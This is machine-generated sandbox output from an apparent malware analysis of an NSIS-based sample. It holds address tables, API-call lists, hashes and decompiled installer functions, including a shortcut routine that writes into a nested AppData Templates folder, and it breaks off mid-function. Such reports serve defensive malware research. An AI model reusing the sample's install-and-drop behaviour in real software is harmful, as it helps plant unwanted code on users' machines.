                                                0x6eb821fc
                                                0x00000000
                                                0x00000000
                                                0x6eb821fe
                                                0x6eb82202
                                                0x00000000
                                                0x00000000
                                                0x6eb82204
                                                0x6eb8220b
                                                0x6eb8220b
                                                0x6eb82211
                                                0x6eb82214
                                                0x6eb82230
                                                0x6eb82216
                                                0x6eb8221f
                                                0x6eb82222
                                                0x6eb82222
                                                0x00000000
                                                0x6eb82214
                                                0x6eb821e3
                                                0x6eb821e6
                                                0x6eb821ea
                                                0x00000000
                                                0x00000000
                                                0x6eb821ec
                                                0x00000000
                                                0x6eb821ec
                                                0x6eb821d5
                                                0x6eb821d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb821d8
                                                0x6eb81dfe
                                                0x6eb81dfe
                                                0x6eb81dff
                                                0x6eb81f49
                                                0x6eb81f49
                                                0x6eb81f50
                                                0x6eb81f53
                                                0x00000000
                                                0x00000000
                                                0x6eb81f60
                                                0x00000000
                                                0x6eb8214b
                                                0x6eb8214e
                                                0x6eb82151
                                                0x6eb82151
                                                0x6eb82152
                                                0x6eb82153
                                                0x6eb82156
                                                0x6eb82159
                                                0x6eb8215c
                                                0x00000000
                                                0x00000000
                                                0x6eb8215e
                                                0x6eb8215e
                                                0x6eb82162
                                                0x6eb8217a
                                                0x6eb8217d
                                                0x6eb82181
                                                0x6eb82187
                                                0x00000000
                                                0x6eb82187
                                                0x6eb82164
                                                0x6eb82164
                                                0x6eb82167
                                                0x00000000
                                                0x00000000
                                                0x6eb82169
                                                0x6eb8216c
                                                0x6eb8216e
                                                0x6eb8216f
                                                0x6eb8216f
                                                0x6eb8216f
                                                0x6eb82170
                                                0x6eb82173
                                                0x6eb82176
                                                0x6eb82177
                                                0x6eb82151
                                                0x6eb82152
                                                0x6eb82153
                                                0x6eb82156
                                                0x6eb82159
                                                0x6eb8215c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb8215c
                                                0x00000000
                                                0x6eb81fa7
                                                0x00000000
                                                0x00000000
                                                0x6eb81fb3
                                                0x00000000
                                                0x00000000
                                                0x6eb81f9a
                                                0x6eb81f9e
                                                0x6eb81fa2
                                                0x00000000
                                                0x00000000
                                                0x6eb8211c
                                                0x6eb82120
                                                0x00000000
                                                0x00000000
                                                0x6eb82126
                                                0x6eb8212f
                                                0x6eb82136
                                                0x6eb8213e
                                                0x00000000
                                                0x00000000
                                                0x6eb82083
                                                0x6eb82083
                                                0x00000000
                                                0x00000000
                                                0x6eb81fbc
                                                0x00000000
                                                0x00000000
                                                0x6eb821a6
                                                0x00000000
                                                0x00000000
                                                0x6eb8208b
                                                0x6eb8208d
                                                0x6eb8208d
                                                0x00000000
                                                0x00000000
                                                0x6eb82196
                                                0x00000000
                                                0x00000000
                                                0x6eb8219a
                                                0x00000000
                                                0x00000000
                                                0x6eb821a2
                                                0x00000000
                                                0x00000000
                                                0x6eb820d3
                                                0x6eb820d5
                                                0x6eb820d5
                                                0x00000000
                                                0x00000000
                                                0x6eb8209d
                                                0x6eb8209f
                                                0x6eb8209f
                                                0x00000000
                                                0x00000000
                                                0x6eb820af
                                                0x6eb820b1
                                                0x6eb820b1
                                                0x00000000
                                                0x00000000
                                                0x6eb820e1
                                                0x6eb820e3
                                                0x6eb820e3
                                                0x00000000
                                                0x00000000
                                                0x6eb820ba
                                                0x6eb820bc
                                                0x6eb820bc
                                                0x00000000
                                                0x00000000
                                                0x6eb820c1
                                                0x00000000
                                                0x00000000
                                                0x6eb8219e
                                                0x6eb821a8
                                                0x6eb821a8
                                                0x00000000
                                                0x00000000
                                                0x6eb820ec
                                                0x6eb820f0
                                                0x6eb820f5
                                                0x6eb820f8
                                                0x6eb820f9
                                                0x6eb820fc
                                                0x6eb82102
                                                0x6eb82102
                                                0x00000000
                                                0x00000000
                                                0x6eb8218e
                                                0x00000000
                                                0x00000000
                                                0x6eb820c5
                                                0x6eb820c7
                                                0x6eb820c7
                                                0x00000000
                                                0x00000000
                                                0x6eb81fc3
                                                0x6eb81fc3
                                                0x00000000
                                                0x00000000
                                                0x6eb820da
                                                0x6eb820dc
                                                0x6eb820dc
                                                0x00000000
                                                0x00000000
                                                0x6eb81f67
                                                0x6eb81f6d
                                                0x6eb81f70
                                                0x6eb81f72
                                                0x6eb81f72
                                                0x6eb81f75
                                                0x6eb81f79
                                                0x6eb81f86
                                                0x6eb81f88
                                                0x6eb81f8e
                                                0x6eb81f8e
                                                0x6eb81f8e
                                                0x00000000
                                                0x00000000
                                                0x6eb8208e
                                                0x6eb8208e
                                                0x6eb82090
                                                0x6eb82097
                                                0x00000000
                                                0x00000000
                                                0x6eb820d6
                                                0x6eb820d6
                                                0x00000000
                                                0x00000000
                                                0x6eb820a0
                                                0x6eb820a0
                                                0x6eb820a2
                                                0x6eb820a9
                                                0x00000000
                                                0x00000000
                                                0x6eb820b2
                                                0x6eb820b2
                                                0x6eb820b4
                                                0x00000000
                                                0x00000000
                                                0x6eb820e4
                                                0x6eb820e4
                                                0x00000000
                                                0x00000000
                                                0x6eb820bd
                                                0x6eb820bd
                                                0x00000000
                                                0x00000000
                                                0x6eb8210a
                                                0x6eb8210e
                                                0x6eb82113
                                                0x6eb82116
                                                0x00000000
                                                0x00000000
                                                0x6eb820c8
                                                0x6eb820c8
                                                0x6eb820cb
                                                0x6eb820cd
                                                0x00000000
                                                0x00000000
                                                0x6eb820dd
                                                0x6eb820dd
                                                0x6eb820e6
                                                0x6eb820e6
                                                0x6eb81fc5
                                                0x6eb81fc5
                                                0x6eb81fc8
                                                0x6eb81fcf
                                                0x6eb81fd1
                                                0x6eb81fd3
                                                0x6eb81fda
                                                0x6eb81fdd
                                                0x6eb81fe2
                                                0x6eb81fe4
                                                0x6eb81fe6
                                                0x6eb81fea
                                                0x6eb81ff0
                                                0x6eb81ff6
                                                0x6eb81ff6
                                                0x6eb81ff8
                                                0x6eb81ff8
                                                0x6eb81ff9
                                                0x6eb81ff9
                                                0x6eb81ffd
                                                0x6eb82003
                                                0x6eb82005
                                                0x6eb82009
                                                0x6eb8200e
                                                0x6eb8200e
                                                0x6eb82010
                                                0x6eb82010
                                                0x6eb82013
                                                0x6eb82016
                                                0x6eb8201f
                                                0x6eb82025
                                                0x6eb82028
                                                0x6eb82028
                                                0x6eb8202a
                                                0x6eb8202d
                                                0x6eb82033
                                                0x6eb82039
                                                0x6eb82039
                                                0x6eb8203b
                                                0x00000000
                                                0x00000000
                                                0x6eb82041
                                                0x6eb82041
                                                0x6eb82045
                                                0x6eb8204c
                                                0x6eb82070
                                                0x6eb82070
                                                0x6eb82074
                                                0x6eb82076
                                                0x6eb82079
                                                0x6eb82079
                                                0x6eb8207c
                                                0x6eb8207c
                                                0x00000000
                                                0x6eb82074
                                                0x6eb82051
                                                0x6eb82054
                                                0x6eb82054
                                                0x6eb8205b
                                                0x6eb8205d
                                                0x6eb82060
                                                0x6eb82067
                                                0x6eb82068
                                                0x6eb8206e
                                                0x6eb8206e
                                                0x00000000
                                                0x6eb8206e
                                                0x6eb82062
                                                0x6eb82065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb82065
                                                0x6eb81ff2
                                                0x6eb81ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81f60
                                                0x6eb81e05
                                                0x6eb81e05
                                                0x6eb81e06
                                                0x6eb81f46
                                                0x00000000
                                                0x6eb81f46
                                                0x6eb81e0c
                                                0x6eb81e0d
                                                0x00000000
                                                0x00000000
                                                0x6eb81e13
                                                0x6eb81e16
                                                0x6eb81f0b
                                                0x6eb81f0b
                                                0x6eb81f0e
                                                0x6eb81f23
                                                0x6eb81f25
                                                0x6eb81f25
                                                0x6eb81f26
                                                0x6eb81f29
                                                0x6eb81f2c
                                                0x6eb81f38
                                                0x6eb81f38
                                                0x6eb81f38
                                                0x6eb81f2e
                                                0x6eb81f2e
                                                0x6eb81f2e
                                                0x6eb81f3e
                                                0x00000000
                                                0x6eb81f3e
                                                0x6eb81f10
                                                0x6eb81f10
                                                0x6eb81f11
                                                0x6eb81f1f
                                                0x00000000
                                                0x6eb81f1f
                                                0x6eb81f14
                                                0x6eb81f15
                                                0x00000000
                                                0x00000000
                                                0x6eb81f1b
                                                0x00000000
                                                0x6eb81f1b
                                                0x6eb81e1c
                                                0x6eb81f07
                                                0x00000000
                                                0x6eb81f07
                                                0x6eb81e22
                                                0x6eb81e22
                                                0x6eb81e25
                                                0x6eb81e4e
                                                0x00000000
                                                0x6eb81e4e
                                                0x6eb81e27
                                                0x6eb81e27
                                                0x6eb81e2a
                                                0x6eb81e44
                                                0x00000000
                                                0x6eb81e44
                                                0x6eb81e2c
                                                0x6eb81e2c
                                                0x6eb81e2f
                                                0x6eb81e3e
                                                0x00000000
                                                0x6eb81e3e
                                                0x6eb81e32
                                                0x6eb81e33
                                                0x00000000
                                                0x00000000
                                                0x6eb81e35
                                                0x00000000
                                                0x6eb81cec
                                                0x6eb81cec
                                                0x6eb81cef
                                                0x00000000
                                                0x6eb81cef
                                                0x6eb81ce6
                                                0x6eb81cd3
                                                0x6eb81cd8
                                                0x00000000
                                                0x00000000
                                                0x6eb81cda
                                                0x6eb81cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81cdd
                                                0x6eb81c6d
                                                0x6eb81c70
                                                0x6eb81ca6
                                                0x6eb81ca9
                                                0x00000000
                                                0x6eb81caf
                                                0x6eb81cb1
                                                0x6eb81cb5
                                                0x6eb81cbc
                                                0x6eb81cc3
                                                0x6eb81cc6
                                                0x6eb81cc9
                                                0x00000000
                                                0x6eb81cc9
                                                0x6eb81ca9
                                                0x6eb81c72
                                                0x6eb81c73
                                                0x6eb81c8e
                                                0x6eb81c91
                                                0x00000000
                                                0x6eb81c97
                                                0x6eb81c97
                                                0x6eb81c9e
                                                0x6eb81ca1
                                                0x00000000
                                                0x6eb81ca1
                                                0x6eb81c91
                                                0x6eb81c78
                                                0x00000000
                                                0x6eb81c7e
                                                0x6eb81c7e
                                                0x6eb81c85
                                                0x00000000
                                                0x6eb81c85
                                                0x6eb81c78
                                                0x6eb81e74
                                                0x6eb81e79
                                                0x6eb81e7e
                                                0x6eb81e82
                                                0x6eb82355
                                                0x6eb8235b
                                                0x6eb81e94
                                                0x6eb81e96
                                                0x6eb81e97
                                                0x6eb8227e
                                                0x6eb8227e
                                                0x6eb82281
                                                0x6eb82284
                                                0x6eb822a1
                                                0x6eb822a7
                                                0x6eb822a9
                                                0x6eb822af
                                                0x6eb822c6
                                                0x6eb822c6
                                                0x6eb822c6
                                                0x6eb822d3
                                                0x6eb822d9
                                                0x6eb822dc
                                                0x6eb822e2
                                                0x6eb822e4
                                                0x6eb822e8
                                                0x6eb822ea
                                                0x6eb822f1
                                                0x6eb822f6
                                                0x6eb822f9
                                                0x6eb822fb
                                                0x6eb82300
                                                0x6eb82312
                                                0x6eb82312
                                                0x6eb82300
                                                0x6eb822f9
                                                0x6eb822e8
                                                0x6eb82318
                                                0x6eb8231b
                                                0x6eb82325
                                                0x6eb8232d
                                                0x6eb8233a
                                                0x6eb82340
                                                0x6eb82343
                                                0x6eb82273
                                                0x6eb82273
                                                0x00000000
                                                0x6eb82273
                                                0x6eb82349
                                                0x6eb8234f
                                                0x6eb8234f
                                                0x00000000
                                                0x00000000
                                                0x6eb82351
                                                0x6eb82351
                                                0x6eb82351
                                                0x6eb82351
                                                0x00000000
                                                0x6eb8231d
                                                0x6eb8231d
                                                0x6eb82323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb82323
                                                0x6eb8231b
                                                0x6eb822b2
                                                0x6eb822b8
                                                0x6eb822ba
                                                0x6eb822c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb822c0
                                                0x6eb82286
                                                0x6eb8228d
                                                0x6eb82293
                                                0x6eb82299
                                                0x00000000
                                                0x6eb82299
                                                0x6eb81e9d
                                                0x6eb81e9e
                                                0x6eb8225d
                                                0x6eb8225d
                                                0x6eb82263
                                                0x6eb82266
                                                0x00000000
                                                0x00000000
                                                0x6eb8226d
                                                0x6eb82272
                                                0x00000000
                                                0x6eb82272
                                                0x6eb81ea5
                                                0x00000000
                                                0x00000000
                                                0x6eb81eab
                                                0x6eb81eab
                                                0x6eb81eb4
                                                0x6eb81eb9
                                                0x6eb81ebf
                                                0x00000000
                                                0x00000000
                                                0x6eb81ec5
                                                0x6eb81ed2
                                                0x6eb81ed8
                                                0x6eb81ee2
                                                0x6eb81ee8
                                                0x6eb81ef0
                                                0x6eb81f00
                                                0x00000000
                                                0x6eb81f00

                                                APIs
                                                  • Part of subcall function 6EB812BB: GlobalAlloc.KERNELBASE(00000040,?,6EB812DB,?,6EB8137F,00000019,6EB811CA,-000000A0), ref: 6EB812C5
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6EB81D2D
                                                • lstrcpyW.KERNEL32 ref: 6EB81D75
                                                • lstrcpyW.KERNEL32 ref: 6EB81D7F
                                                • GlobalFree.KERNEL32 ref: 6EB81D92
                                                • GlobalFree.KERNEL32 ref: 6EB81E74
                                                • GlobalFree.KERNEL32 ref: 6EB81E79
                                                • GlobalFree.KERNEL32 ref: 6EB81E7E
                                                • GlobalFree.KERNEL32 ref: 6EB82068
                                                • lstrcpyW.KERNEL32 ref: 6EB82222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6EB822A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6EB822B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 6EB8230C
                                                • lstrlenW.KERNEL32(00000808), ref: 6EB82326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: dd6c11fddd32b036ddade8c0f3862bc23d2804fbe7b0c2411214d5028424eb4e
                                                • Instruction ID: 20e9adc45b53a6ea1a9afd179343ccf52c1bd7469784e6ff0e614282cf7384e9
                                                • Opcode Fuzzy Hash: dd6c11fddd32b036ddade8c0f3862bc23d2804fbe7b0c2411214d5028424eb4e
                                                • Instruction Fuzzy Hash: 9E22B771C1528ADEDB508FE9C9906EFBFB4FB0A305F24452AD1B5A7380D7709A898B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless");
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 00402269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless
                                                • API String ID: 542301482-4283889662
                                                • Opcode ID: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
                                                • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                • Opcode Fuzzy Hash: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
                                                • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x42a248;
                                                				_v28 =  *0x42a230 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x42a239 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E1E(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x4236ec;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x423700;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x4236ec = 0;
                                                								 *0x423700 = 0;
                                                								 *0x42a280 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404E9E();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x423700;
                                                									_t201 =  *0x42a248;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x42a24c <= 0) {
                                                										L86:
                                                										if( *0x42a2de == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
                                                											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x42a24c);
                                                									goto L86;
                                                								} else {
                                                									_t293 = E004012E2( *0x423700);
                                                									E00401299(_t293);
                                                									_t222 = 0;
